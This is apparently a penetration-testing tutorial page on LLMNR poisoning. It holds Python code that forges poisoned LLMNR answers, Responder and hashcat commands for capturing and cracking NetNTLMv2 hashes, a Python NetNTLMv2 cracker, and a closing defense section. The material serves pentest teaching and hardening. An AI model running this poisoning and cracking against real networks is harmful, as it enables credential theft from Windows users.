# LLMNR Poisoning

## What is LLMNR?

{% hint style="info" %}
**LLMNR (Link-Local Multicast Name Resolution)** is a decentralized name-resolution protocol, similar to DNS, that resolves hostnames on the same **local network**. Its packets are sent to a link-local multicast address, so routers do not forward them and they never leave the network segment.
{% endhint %}

It has been included in Windows since Windows Vista and is the third method Windows tries when resolving a name. The order of preference is the following:

1. DNS
2. mDNS
3. **LLMNR**
4. NBNS

In a Windows network the computers listen on UDP port `5355`. To resolve a name, a client sends an LLMNR query to the multicast address `224.0.0.252` (IPv4) or `FF02::1:3` (IPv6). The queries use the DNS message format, so they can carry not only name (A/AAAA) questions but any question type DNS supports.

## What is LLMNR Poisoning?

The common case is a host using LLMNR to resolve a name on the local link by sending an A query. Only the computer that owns the queried name is supposed to answer. **But nothing in the protocol authenticates the answer: any host on the segment can reply, including an attacker, who can point the name at their own machine and take a man-in-the-middle position.**
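To make concrete how little ties an answer to a query, here is an added Python example (not code from this page or from Responder) that builds an LLMNR query in DNS wire format, parses one, and forges the answer a poisoner would send. The name `fileshrae`, the transaction ID `0x1234` and the attacker address `10.0.0.66` are constructed test values.

```python
"""Build, parse and forge LLMNR packets (RFC 4795, DNS wire format).

Added example, not code from the page or from Responder. The name, transaction
ID and attacker address used below are constructed test values.
"""
import socket
import struct
from typing import Optional

LLMNR_PORT = 5355
LLMNR_MCAST_V4 = "224.0.0.252"
QTYPE_A = 1
QCLASS_IN = 1
FLAG_QR = 0x8000  # set in responses, clear in queries


def encode_name(name: str) -> bytes:
    """DNS label encoding: length-prefixed labels, terminated by a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("utf-8")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def decode_name(buf: bytes, offset: int):
    """Decode a label sequence; returns (name, offset just past the terminator)."""
    labels = []
    while True:
        length = buf[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        labels.append(buf[offset:offset + length].decode("utf-8"))
        offset += length


def build_query(txid: int, name: str, qtype: int = QTYPE_A) -> bytes:
    """What a Windows host multicasts after DNS failed: header + one question, no answers."""
    header = struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)  # id, flags, QD, AN, NS, AR
    return header + encode_name(name) + struct.pack(">HH", qtype, QCLASS_IN)


def parse_query(pkt: bytes):
    """Extract id, name and type from a query; None if this is a response or malformed."""
    if len(pkt) < 12:
        return None
    txid, flags, qdcount, _, _, _ = struct.unpack(">HHHHHH", pkt[:12])
    if flags & FLAG_QR or qdcount != 1:
        return None
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack(">HH", pkt[off:off + 4])
    return {"txid": txid, "name": name, "qtype": qtype, "qclass": qclass}


def build_poisoned_response(query: bytes, attacker_ip: str, ttl: int = 30) -> Optional[bytes]:
    """Answer an A query with the attacker's address. The only things the victim checks are
    the 16-bit id and the name, and both are copied straight out of the multicast query."""
    q = parse_query(query)
    if q is None or q["qtype"] != QTYPE_A:
        return None
    header = struct.pack(">HHHHHH", q["txid"], FLAG_QR, 1, 1, 0, 0)
    question = encode_name(q["name"]) + struct.pack(">HH", QTYPE_A, QCLASS_IN)
    rdata = socket.inet_aton(attacker_ip)
    answer = encode_name(q["name"]) + struct.pack(">HHIH", QTYPE_A, QCLASS_IN, ttl, len(rdata)) + rdata
    return header + question + answer


def parse_response(pkt: bytes):
    """Return (txid, flags, [(name, type, ttl, rdata), ...]); A records are rendered as dotted quads."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack(">HHHHHH", pkt[:12])
    off = 12
    for _ in range(qdcount):  # skip the echoed question(s)
        _, off = decode_name(pkt, off)
        off += 4
    answers = []
    for _ in range(ancount):
        name, off = decode_name(pkt, off)
        rtype, _, ttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
        off += 10
        rdata = pkt[off:off + rdlen]
        off += rdlen
        answers.append((name, rtype, ttl, socket.inet_ntoa(rdata) if rtype == QTYPE_A else rdata))
    return txid, flags, answers


def open_llmnr_socket(local_ip: str) -> socket.socket:
    """Socket a poisoner (or a detector) would use: bound to 5355 and joined to the LLMNR group.
    Not called in the demo below because it needs a real interface address."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("", LLMNR_PORT))
    mreq = socket.inet_aton(LLMNR_MCAST_V4) + socket.inet_aton(local_ip)
    s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    return s


if __name__ == "__main__":
    # Constructed scenario: a user mistyped \\fileshrae, DNS failed, the host multicasts an LLMNR A query.
    query = build_query(0x1234, "fileshrae")
    print("victim asks  :", parse_query(query))
    forged = build_poisoned_response(query, "10.0.0.66")
    print("poisoner says:", parse_response(forged))
```

Responder does essentially this in a loop on a socket like the one `open_llmnr_socket` returns: read every multicast query, answer with its own address. The victim accepts the first answer whose transaction ID and name match, and both values were broadcast to the whole segment in the query itself, which is why the race is trivially won by whoever is listening.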

{% hint style="warning" %}
The key flaw is what happens after the victim accepts the forged answer: it connects to the attacker's host (for example to open an SMB share or an HTTP resource) and Windows transparently authenticates with NTLM, handing over the **username and a NetNTLMv2 challenge-response** computed from the user's password hash. That response can then be cracked offline.
{% endhint %}

An attacker can use [Responder](https://github.com/lgandx/Responder) to collect these NetNTLMv2 hashes on networks with Windows machines:

![LLMNR Poisoning](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MWVjG_njKgBtvmnKaJh%2Fuploads%2FVKVtkh1AgXYIcBoI7V4X%2Fimage.png?alt=media\&token=5d36b025-af42-44a8-90c5-37758419fae3)

{% hint style="info" %}
Starting a Responder listener is typically one of the **very first steps** of an internal AD pentest, since it collects hashes passively while the rest of the engagement proceeds.
{% endhint %}

## Exploitation

#### Step 1: Run Responder

{% embed url="https://github.com/lgandx/Responder" %}
Responder
{% endembed %}

Responder starts the LLMNR/NBT-NS/mDNS poisoners together with rogue services (SMB, HTTP, ...) that capture the authentication attempts:

```shell
# -I  interface to listen on; use the interface attached to the target LAN
#     (tun0 is a VPN interface, on a physical engagement this is usually eth0)
# -w  start the rogue WPAD proxy server
# -d  meaning differs between Responder versions (NBT-NS domain answers in
#     older releases, DHCP poisoning in current ones); check `responder -h`
responder -I tun0 -dw
```

#### Step 2: Wait for an Event

We wait for a host on the segment to ask for a name that DNS cannot resolve, for example a user mistyping a share path (`\\fileshrae\` instead of `\\fileshare\`). The DNS failure makes Windows fall back to LLMNR (and NBT-NS), and Responder answers those queries with its own address.

#### Step 3: Get Hashes

When the victim accepts the poisoned answer it connects to Responder's rogue SMB or HTTP service and authenticates automatically. Responder prints the username together with the NetNTLMv2 challenge-response in the `user::domain:challenge:NTProofStr:blob` format that hashcat expects, and also writes it to its `logs/` directory.

#### Step 4: Crack Hashes

hashcat is built to run on the GPU, which cracks NetNTLMv2 far faster than cracking on the CPU (the default for John the Ripper). A GPU is normally not exposed to a Kali virtual machine, so copy the captured hashes to the Windows host and run hashcat there:

```shell
hashcat -m 5600 hashes.txt rockyou.txt -O -r rules/OneRuleToRuleThemAll.rule --debug-mode=1 --debug-file=matched.rule --hwmon-disable
```

Notes:

* Install the GPU driver and, for NVIDIA cards, the CUDA toolkit first
* The hash type is NetNTLMv2 -> `-m 5600`
* `-O` selects the optimized kernels (faster, but limits the maximum password length)
* OneRuleToRuleThemAll: <https://github.com/NotSoSecure/password_cracking_rules>
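What hashcat mode 5600 actually does is recompute the NetNTLMv2 response for each candidate password and compare it with the captured `NTProofStr`; nothing is "decrypted". The following added Python example (not Responder or hashcat code) implements that check end to end, including MD4 for the NT hash because `hashlib` often lacks MD4 on OpenSSL 3 builds. The user `svc_backup`, domain `CORP`, password `Winter2023!` and the capture line it produces are constructed here, not real captures.

```python
"""Recompute a NetNTLMv2 response (hashcat mode 5600) for candidate passwords.

Added example; not Responder or hashcat code. The user, domain, password and
the capture line below are constructed for illustration.
"""
import hashlib
import hmac
import os
import struct
import time
from typing import Iterable, Optional

MASK32 = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    x &= MASK32
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4. Implemented here because hashlib's md4 is often unavailable."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    k3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1
            a, b, c, d = d, _rotl(a + f(b, c, d) + X[i], (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            a, b, c, d = d, _rotl(a + g(b, c, d) + X[(i % 4) * 4 + i // 4] + 0x5A827999, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            a, b, c, d = d, _rotl(a + (b ^ c ^ d) + X[k3[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4]), b, c
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is what is stored in the SAM / NTDS."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    """NTLMv2 hash = HMAC-MD5(NT hash, UTF-16LE(upper(user) + domain)). The domain keeps its case."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def nt_proof_str(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTLMv2 hash, server challenge || client blob): the value Responder captures."""
    return hmac.new(ntlmv2_key(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def parse_capture(line: str):
    """Parse the user::domain:challenge:NTProofStr:blob line Responder prints (hashcat -m 5600 input)."""
    user, _, domain, challenge, proof, blob = line.strip().split(":")
    return user, domain, bytes.fromhex(challenge), bytes.fromhex(proof), bytes.fromhex(blob)


def crack(line: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the candidate whose recomputed NTProofStr matches the capture, or None."""
    user, domain, challenge, proof, blob = parse_capture(line)
    for password in candidates:
        if hmac.compare_digest(nt_proof_str(password, user, domain, challenge, blob), proof):
            return password
    return None


def forge_capture(user: str, domain: str, password: str) -> str:
    """Build a capture line for a known password (constructed test data, not a real capture)."""
    server_challenge = os.urandom(8)
    filetime = int((time.time() + 11644473600) * 10_000_000)
    # Shape of NTLMv2_CLIENT_CHALLENGE: type bytes, reserved, timestamp, client nonce, reserved, empty AV pairs.
    blob = b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", filetime) + os.urandom(8) + b"\x00" * 4 + b"\x00" * 4
    proof = nt_proof_str(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


if __name__ == "__main__":
    captured = forge_capture("svc_backup", "CORP", "Winter2023!")
    print(captured)
    print("cracked:", crack(captured, ["password", "letmein", "Winter2023!"]))
```

Two things follow from the construction. The server challenge and the client blob are different for every capture, so the same password yields a different `NTProofStr` each time and precomputed tables do not help; only guessing works, and the HMAC-MD5 per guess is cheap, which is why GPUs get through rockyou plus rules quickly. And because the user name is upper-cased but the domain is not, a capture line whose domain case was altered will never crack, a frequent cause of "exhausted" runs against hashes that should have been easy.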

## Defense

* **The best defense is to disable LLMNR and NBT-NS.**
  * To disable LLMNR, enable "Turn Off Multicast Name Resolution" under "Local Computer Policy -> Computer Configuration -> Administrative Templates -> Network -> DNS Client" in the Group Policy Editor (or push the same setting through a domain GPO). The policy sets the registry value `EnableMulticast` to `0` under `HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient`.
  * To disable NBT-NS, navigate to "Network Connections -> Network Adapter Properties -> TCP/IPv4 Properties -> Advanced -> WINS" and select "Disable NetBIOS over TCP/IP". This is a per-adapter setting; it corresponds to `NetbiosOptions` = `2` under `HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_<adapter GUID>`, so verify every interface, including ones added later.
* If a company must use, or cannot disable, LLMNR/NBT-NS, the best course of action is to:
  * **Require Network Access Control**, so that an unauthorised device cannot join the segment and answer queries in the first place.
  * **Require strong user passwords** (e.g. more than 14 characters, no common words). The captured NetNTLMv2 response is broken by guessing passwords offline, so the longer and less predictable the password, the less likely the crack succeeds.
